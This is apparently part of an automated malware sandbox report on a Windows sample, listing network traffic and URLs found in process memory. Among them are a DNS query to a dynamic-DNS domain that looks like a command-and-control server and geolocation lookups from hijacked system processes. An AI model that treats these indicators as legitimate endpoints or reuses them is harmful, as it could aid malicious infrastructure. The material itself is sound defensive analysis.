              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00424A66 recv,13_2_00424A66
              Source: global trafficDNS traffic detected: DNS query: windowsserverfebarch.duckdns.org
              Source: svchost.exe, 00000016.00000003.1441392975.00000127C5102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS</ds:KeyName>&lt:KeyInfo
              Source: svchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
              Source: svchost.exe, 00000016.00000003.3307925667.00000127C5076000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451985460.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465314672.00000127C5932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
              Source: svchost.exe, 00000016.00000002.3308848752.00000127C50B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3309635765.00000127C60E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3309611722.00000127C60D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
              Source: svchost.exe, 00000002.00000002.2966266630.00000250E6800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308848752.00000127C50D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000016.00000003.1451872925.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
              Source: svchost.exe, 00000016.00000003.1479153178.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451899387.00000127C595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: svchost.exe, 00000016.00000003.1493011495.00000127C5955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd3wiK1y
              Source: svchost.exe, 00000016.00000003.3306981164.00000127C590F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307382053.00000127C590F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
              Source: svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurity
              Source: svchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdference
              Source: svchost.exe, 00000016.00000003.1492845140.00000127C592F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdp://sc
              Source: svchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsyVb/vlWA
              Source: svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd~
              Source: svchost.exe, 00000016.00000003.1451565806.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451565806.00000127C5954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465879513.00000127C592A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465290470.00000127C595D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451899387.00000127C595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: svchost.exe, 00000016.00000003.1492845140.00000127C592F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.0.xs
              Source: svchost.exe, 00000016.00000003.3306981164.00000127C590F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307382053.00000127C590F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
              Source: svchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAAA
              Source: svchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdJjT99GvGMU
              Source: svchost.exe, 00000016.00000003.1493011495.00000127C5955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdRYqRX
              Source: svchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdVyq
              Source: svchost.exe, 00000016.00000003.1451565806.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451899387.00000127C595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
              Source: svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhema
              Source: svchost.exe, 00000016.00000003.1492845140.00000127C592F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdorg
              Source: svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2
              Source: svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoa
              Source: svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml
              Source: svchost.exe, 00000016.00000003.1498513433.00000127C607D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1484910298.00000127C5952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
              Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: qmgr.db.2.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: csc.exe, ngen.exe, wmplayer.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: svchost.exe, 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ngen.exe, 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: svchost.exe, 00000016.00000002.3309287313.00000127C605B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
              Source: svchost.exe, 00000016.00000003.1501156499.00000127C5931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
              Source: svchost.exe, 00000016.00000003.3307665855.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306823290.00000127C594A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306202897.00000127C5949000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306846415.00000127C594C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
              Source: svchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: svchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: svchost.exe, 00000016.00000003.3306229401.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307739912.00000127C5965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sccI=c
              Source: svchost.exe, 00000016.00000003.3306499705.00000127C593A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307643246.00000127C5943000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306420605.00000127C5937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306773985.00000127C5942000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306680570.00000127C5941000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sconnce
              Source: svchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: svchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1479614027.00000127C5953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465314672.00000127C592D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1488317701.00000127C5959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451985460.00000127C595A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1479614027.00000127C5959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451985460.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465314672.00000127C5932000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1488411468.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1479992974.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1488317701.00000127C5953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
              Source: svchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307576853.00000127C596F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuef
              Source: svchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
              Source: svchost.exe, 00000016.00000002.3308906391.00000127C50E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307576853.00000127C596F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
              Source: svchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307576853.00000127C596F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
              Source: svchost.exe, 00000016.00000003.3306499705.00000127C593A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307643246.00000127C5943000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306420605.00000127C5937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306773985.00000127C5942000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306680570.00000127C5941000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustn
              Source: LisectAVT_2403002A_136.exe, 00000000.00000002.1359537990.0000021425801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Amcache.hve.16.drString found in binary or memory: http://upx.sf.net
              Source: svchost.exe, 00000016.00000003.1441392975.00000127C5102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
              Source: svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
              Source: svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
              Source: svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603ssuer
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420714728.00000127C5957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
              Source: qmgr.db.2.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
              Source: svchost.exe, 00000002.00000003.1335457695.00000250E6A00000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
              Source: svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf215
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
              Source: svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf.srf
              Source: svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3309287313.00000127C605B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
              Source: svchost.exe, 00000016.00000002.3309166088.00000127C6013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srft
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
              Source: svchost.exe, 00000016.00000003.1421113174.00000127C5927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
